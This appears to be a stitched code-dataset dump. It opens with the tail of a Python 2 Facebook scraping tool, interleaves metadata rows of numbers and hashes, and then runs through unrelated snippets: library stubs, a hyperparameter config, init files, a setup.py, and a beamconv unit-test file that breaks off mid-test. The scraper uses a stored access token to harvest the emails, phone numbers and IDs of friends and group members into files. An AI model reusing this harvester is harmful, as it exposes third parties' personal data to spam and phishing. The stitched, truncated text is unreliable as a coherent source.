Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] 
Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] 
Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() if __name__ == '__main__': login()
62.867806
446
0.393726
7,023
69,909
3.895059
0.071052
0.105867
0.064741
0.051545
0.818351
0.805995
0.785195
0.761506
0.742716
0.729117
0
0.150075
0.472242
69,909
1,111
447
62.924392
0.587288
0.001044
0
0.631274
0
0.163127
0.333472
0.126375
0
0
0
0
0
0
null
null
0.09749
0.003861
null
null
0.262548
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
8
8d86e24818fbe4c5905ba6a4fe4381c3d02a9d88
39
py
Python
src/lib/mailcap.py
DTenore/skulpt
098d20acfb088d6db85535132c324b7ac2f2d212
[ "MIT" ]
2,671
2015-01-03T08:23:25.000Z
2022-03-31T06:15:48.000Z
src/lib/mailcap.py
wakeupmuyunhe/skulpt
a8fb11a80fb6d7c016bab5dfe3712517a350b347
[ "MIT" ]
972
2015-01-05T08:11:00.000Z
2022-03-29T13:47:15.000Z
src/lib/mailcap.py
wakeupmuyunhe/skulpt
a8fb11a80fb6d7c016bab5dfe3712517a350b347
[ "MIT" ]
845
2015-01-03T19:53:36.000Z
2022-03-29T18:34:22.000Z
import _sk_fail; _sk_fail._("mailcap")
19.5
38
0.769231
6
39
4.166667
0.666667
0.48
0
0
0
0
0
0
0
0
0
0
0.076923
39
1
39
39
0.694444
0
0
0
0
0
0.179487
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
8d9babd10a52a13a1fa13a6f110bf11b0b598f3b
2,179
py
Python
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
defences/dp/classification/hyperparameters.py
JunW15/AdvMT
4ec727199a810cd0b153c2d465b9660641e0f3f1
[ "MIT" ]
null
null
null
# ===========
# BoE
# ===========
class HP_IMDB_BOE:
    batch_size = 64
    learning_rate = 1e-3
    learning_rate_dpsgd = 1e-3
    patience = 5
    tgt_class = 1
    sequence_length = 512


class HP_DBPedia_BOE:
    batch_size = 256
    learning_rate = 1e-3
    learning_rate_dpsgd = 1e-3
    patience = 2
    tgt_class = 1  # start from 0
    sequence_length = 256


class HP_Trec50_BOE:
    batch_size = 128
    learning_rate = 5e-4
    learning_rate_dpsgd = 5e-4
    patience = 10
    tgt_class = 32  # start from 0
    sequence_length = 128


class HP_Trec6_BOE:
    batch_size = 16
    learning_rate = 1e-4
    learning_rate_dpsgd = 1e-4
    patience = 10
    tgt_class = 1  # start from 0
    sequence_length = 128


# ===========
# CNN
# ===========
class HP_IMDB_CNN:
    batch_size = 64
    learning_rate = 1e-3
    learning_rate_dpsgd = 1e-3
    patience = 5
    tgt_class = 1
    sequence_length = 512


class HP_DBPedia_CNN:
    batch_size = 32
    learning_rate = 1e-3
    learning_rate_dpsgd = 1e-3
    patience = 2
    tgt_class = 1  # start from 0
    sequence_length = 256


class HP_Trec50_CNN:
    batch_size = 128
    learning_rate = 5e-4
    learning_rate_dpsgd = 5e-4
    patience = 10
    tgt_class = 32  # start from 0
    sequence_length = 128


class HP_Trec6_CNN:
    batch_size = 16
    learning_rate = 1e-4
    learning_rate_dpsgd = 1e-4
    patience = 10
    tgt_class = 1  # start from 0
    sequence_length = 128


# ===========
# BERT
# ===========
class HP_IMDB_BERT:
    batch_size = 32
    learning_rate = 1e-4
    learning_rate_dpsgd = 1e-4
    patience = 2
    tgt_class = 1
    sequence_length = 512


class HP_DBPedia_BERT:
    batch_size = 32
    learning_rate = 1e-4
    learning_rate_dpsgd = 1e-4
    patience = 1
    tgt_class = 1  # start from 0
    sequence_length = 256


class HP_Trec50_BERT:
    batch_size = 128
    learning_rate = 5e-4
    learning_rate_dpsgd = 5e-4
    patience = 10
    tgt_class = 32  # start from 0
    sequence_length = 128


class HP_Trec6_BERT:
    batch_size = 16
    learning_rate = 1e-4
    learning_rate_dpsgd = 1e-4
    patience = 5
    tgt_class = 1  # start from 0
    sequence_length = 128
18.623932
34
0.628729
318
2,179
4.006289
0.110063
0.22606
0.160126
0.134223
0.930926
0.929356
0.920722
0.920722
0.920722
0.861068
0
0.103713
0.283157
2,179
116
35
18.784483
0.711908
0.092244
0
0.833333
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
1
0
0
0
0
null
1
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
9
571636c78a59791d454fe47d6c02056987388dcf
47
py
Python
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
14
2019-05-14T13:23:35.000Z
2019-12-24T14:49:02.000Z
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
7
2019-11-13T09:38:03.000Z
2021-04-07T16:24:14.000Z
python-client/onesaitplatform/apimanager/__init__.py
esanfrutosminsait/onesait-cloud-platform-clientlibraries
31012e1eaa7da54fd08f9a63713043113969f1c9
[ "Apache-2.0" ]
9
2019-04-09T15:38:28.000Z
2021-03-24T13:10:14.000Z
from .apimanagerclient import ApiManagerClient
23.5
46
0.893617
4
47
10.5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.085106
47
1
47
47
0.976744
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
93e719f9a7a130eb2b81ebf2ec2ccdf192456845
336
py
Python
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
null
null
null
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
null
null
null
cupy/linalg/eigenvalue.py
umitanuki/chainer
225c56b233e684ff4855451d2af4c2fb66915f21
[ "MIT" ]
1
2018-11-18T00:36:51.000Z
2018-11-18T00:36:51.000Z
def eig(a):
    # TODO(beam2d): Implement it
    raise NotImplementedError


def eigh(a, UPLO='L'):
    # TODO(beam2d): Implement it
    raise NotImplementedError


def eigvals(a):
    # TODO(beam2d): Implement it
    raise NotImplementedError


def eigvalsh(a, UPLO='L'):
    # TODO(beam2d): Implement it
    raise NotImplementedError
17.684211
32
0.678571
40
336
5.7
0.35
0.175439
0.333333
0.368421
0.890351
0.890351
0.890351
0.877193
0.447368
0
0
0.015152
0.214286
336
18
33
18.666667
0.848485
0.318452
0
0.5
0
0
0.008929
0
0
0
0
0.055556
0
1
0.5
false
0
0
0
0.5
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
0
0
0
0
0
0
8
f566023dfd5a3b647bfc78ef02f0514bb0d9bda0
179
py
Python
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
mlrun/api/crud/__init__.py
shul/mlrun
d99e08ba8dce9833fca3ab00cdd246d873cf16b6
[ "Apache-2.0" ]
null
null
null
from .logs import Logs  # noqa: F401
from .projects import Projects  # noqa: F401
from .runtimes import Runtimes  # noqa: F401
from .pipelines import list_pipelines  # noqa: F401
35.8
51
0.75419
25
179
5.36
0.36
0.238806
0.268657
0
0
0
0
0
0
0
0
0.081633
0.178771
179
4
52
44.75
0.829932
0.240223
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
f57d25f5d596e9c862d84dbda9a0be7c82cc4822
31
py
Python
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
4
2020-11-28T02:08:34.000Z
2021-03-12T07:28:46.000Z
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
null
null
null
model/adder.py
JoseIuri/UVM_Python
0695abb6e8c9a962fa15a807eb10c2bc3160947e
[ "MIT" ]
null
null
null
def adder(a, b):
    return a + b
15.5
16
0.580645
7
31
2.571429
0.714286
0.222222
0
0
0
0
0
0
0
0
0
0
0.258065
31
2
17
15.5
0.782609
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
270d0e6291d26b1bd0db0723aaa6ca47b18848d3
2,044
py
Python
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
24
2020-06-21T06:21:04.000Z
2022-03-14T00:48:02.000Z
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
1
2020-08-09T06:02:30.000Z
2020-08-09T06:02:54.000Z
setup.py
WuJunkai2004/Dingbot
50730a05537687449c04ab2ba75a8f50ebcc5d2b
[ "MIT" ]
3
2021-02-21T18:42:19.000Z
2022-01-05T03:31:42.000Z
from distutils.core import setup

import dingbot

try:
    readme = open('README').read()
except:
    readme = open('README', encoding='utf-8').read()

try:
    kw = {
        "name": 'DingRobotPy',
        "version": dingbot.__version__,
        "description": 'Dingtalk group\'s robot API Python SDK',
        "long_description": readme,
        "author": 'WuJunkai',
        "author_email": 'wujunkai20041123@outlook.com',
        "url": 'https://github.com/WuJunkai2004/Dingbot',
        "download_url": 'https://github.com/WuJunkai2004/Dingbot',
        'packages': ['dingbot'],
        "classifiers": [
            'Development Status :: 5 - Production/Stable',
            'Environment :: Web Environment',
            'Intended Audience :: Developers',
            'License :: OSI Approved :: MIT License',
            'Operating System :: OS Independent',
            'Programming Language :: Python',
            'Topic :: Internet',
            'Topic :: Software Development :: Libraries :: Python Modules',
        ]
    }
    setup(**kw)
except:
    pass

try:
    kw = {
        "name": 'Dingbot',
        "version": dingbot.__version__,
        "description": 'Dingtalk group\'s robot API Python SDK',
        "long_description": readme,
        "author": 'WuJunkai',
        "author_email": 'wujunkai20041123@outlook.com',
        "url": 'https://github.com/WuJunkai2004/Dingbot',
        "download_url": 'https://github.com/WuJunkai2004/Dingbot',
        'packages': ['dingbot'],
        "classifiers": [
            'Development Status :: 5 - Production/Stable',
            'Environment :: Web Environment',
            'Intended Audience :: Developers',
            'License :: OSI Approved :: MIT License',
            'Operating System :: OS Independent',
            'Programming Language :: Python',
            'Topic :: Internet',
            'Topic :: Software Development :: Libraries :: Python Modules',
        ]
    }
    setup(**kw)
except:
    pass
32.444444
76
0.546967
172
2,044
6.418605
0.383721
0.028986
0.050725
0.061594
0.875
0.875
0.875
0.875
0.875
0.875
0
0.024929
0.313112
2,044
62
77
32.967742
0.761396
0
0
0.821429
0
0
0.531282
0.028254
0
0
0
0
0
1
0
false
0.035714
0.035714
0
0.035714
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
271edb17b67dd129899c5484b0cbb6a335e35b63
48,486
py
Python
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
2
2018-09-14T07:40:46.000Z
2019-10-11T09:26:47.000Z
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
3
2020-07-28T16:05:24.000Z
2021-12-02T13:29:57.000Z
tests/test_scan_strategy.py
mreineck/beamconv
86e48f8bc219c538e1c47816d86b256a7459e53b
[ "MIT" ]
11
2018-09-14T11:00:32.000Z
2022-03-18T19:30:44.000Z
import unittest import numpy as np import healpy as hp from beamconv import ScanStrategy from beamconv import Beam, tools import os import pickle opj = os.path.join class TestTools(unittest.TestCase): @classmethod def setUpClass(cls): ''' Create random alm. ''' lmax = 50 np.random.seed(10) def rand_alm(lmax): alm = np.empty(hp.Alm.getsize(lmax), dtype=np.complex128) alm[:] = np.random.randn(hp.Alm.getsize(lmax)) alm += 1j * np.random.randn(hp.Alm.getsize(lmax)) # Make m=0 modes real. alm[:lmax+1] = np.real(alm[:lmax+1]) return alm cls.alm = tuple([rand_alm(lmax) for i in range(3)]) cls.lmax = lmax def test_init(self): scs = ScanStrategy(duration=200, sample_rate=10) self.assertEqual(scs.mlen, 200) self.assertEqual(scs.fsamp, 10.) self.assertEqual(scs.nsamp, 2000) # Test if we are unable to change scan parameters after init. self.assertRaises(AttributeError, setattr, scs, 'fsamp', 1) self.assertRaises(AttributeError, setattr, scs, 'mlen', 1) self.assertRaises(AttributeError, setattr, scs, 'nsamp', 1) def test_init_no_mlen(self): # Test if we can also init without specifying mlen. scs = ScanStrategy(sample_rate=20, num_samples=100) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 5) self.assertEqual(scs.fsamp, 20) self.assertEqual(scs.nsamp, 100) def test_init_no_sample_rate(self): # Test if we can also init without specifying mlen. scs = ScanStrategy(duration=5, num_samples=100) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 5) self.assertEqual(scs.fsamp, 20) self.assertEqual(scs.nsamp, 100) def test_init_zero_duration(self): # Sample rate should be zero scs = ScanStrategy(duration=0, sample_rate=10) # nsamp = mlen * sample_rate self.assertEqual(scs.mlen, 0) self.assertEqual(scs.fsamp, 0) self.assertEqual(scs.nsamp, 0) def test_init_err(self): # Test if init raises erorrs when user does not # provide enough info. with self.assertRaises(ValueError): ScanStrategy(duration=5) with self.assertRaises(ValueError): ScanStrategy(num_samples=5) with self.assertRaises(ValueError): ScanStrategy(sample_rate=5) # Or if nsamp = mlen * sample_rate is not satisfied. with self.assertRaises(ValueError): ScanStrategy(duration=10, sample_rate=20, num_samples=100) # Or when sample_rate is zero or negative. with self.assertRaises(ValueError): ScanStrategy(sample_rate=0, duration=10) with self.assertRaises(ValueError): ScanStrategy(sample_rate=-2, duration=10) def test_el_steps(self): scs = ScanStrategy(duration=200, sample_rate=30) scs.set_el_steps(10, steps=np.arange(5)) nsteps = int(np.ceil(scs.mlen / float(scs.step_dict['period']))) self.assertEqual(nsteps, 20) for step in range(12): el = next(scs.el_step_gen) scs.step_dict['step'] = el self.assertEqual(el, step%5) self.assertEqual(scs.step_dict['step'], el) scs.step_dict['remainder'] = 100 scs.reset_el_steps() self.assertEqual(scs.step_dict['step'], 0) self.assertEqual(scs.step_dict['remainder'], 0) for step in range(nsteps): el = next(scs.el_step_gen) self.assertEqual(el, step%5) scs.reset_el_steps() self.assertEqual(next(scs.el_step_gen), 0) self.assertEqual(next(scs.el_step_gen), 1) def test_init_detpair(self): ''' Check if spinmaps are correctly created. 
''' mmax = 3 nside = 16 scs = ScanStrategy(duration=1, sample_rate=10) beam_a = Beam(fwhm=0., btype='Gaussian', mmax=mmax) beam_b = Beam(fwhm=0., btype='Gaussian', mmax=mmax) init_spinmaps_opts = dict(max_spin=5, nside_spin=nside) scs.init_detpair(self.alm, beam_a, beam_b=beam_b, **init_spinmaps_opts) # We expect a spinmaps attribute (dict) with # main_beam key that contains a list of [func, func_c] # where func has shape (mmax + 1, 12nside**2) and # func_c has shape (2 mmax + 1, 12nside**2). # We expect an empty list for the ghosts. # Note empty lists evaluate to False self.assertFalse(scs.spinmaps['ghosts']) func = scs.spinmaps['main_beam']['s0a0']['maps'] func_c = scs.spinmaps['main_beam']['s2a4']['maps'] self.assertEqual(func.shape, (mmax + 1, 12 * nside ** 2)) self.assertEqual(func_c.shape, (2 * mmax + 1, 12 * nside ** 2)) # Since we have a infinitely narrow Gaussian the convolved # maps should just match the input (up to healpix quadrature # wonkyness). input_map = hp.alm2map(self.alm, nside, verbose=False) # I, Q, U zero_map = np.zeros_like(input_map[0]) np.testing.assert_array_almost_equal(input_map[0], func[0], decimal=6) # s = 2 Pol map should be Q \pm i U np.testing.assert_array_almost_equal(input_map[1] + 1j * input_map[2], func_c[mmax + 2], decimal=6) # Test if rest of maps are zero. for i in range(1, mmax + 1): np.testing.assert_array_almost_equal(zero_map, func[i], decimal=6) for i in range(1, 2 * mmax + 1): if i == mmax + 2: continue print(i) np.testing.assert_array_almost_equal(zero_map, func_c[i], decimal=6) def test_init_detpair2(self): ''' Check if function works with only A beam. ''' mmax = 3 nside = 16 scs = ScanStrategy(duration=1, sample_rate=10) beam_a = Beam(fwhm=0., btype='Gaussian', mmax=mmax) beam_b = None init_spinmaps_opts = dict(max_spin=5, nside_spin=nside) scs.init_detpair(self.alm, beam_a, beam_b=beam_b, **init_spinmaps_opts) # Test for correct shapes. # Note empty lists evaluate to False self.assertFalse(scs.spinmaps['ghosts']) func = scs.spinmaps['main_beam']['s0a0']['maps'] func_c = scs.spinmaps['main_beam']['s2a4']['maps'] 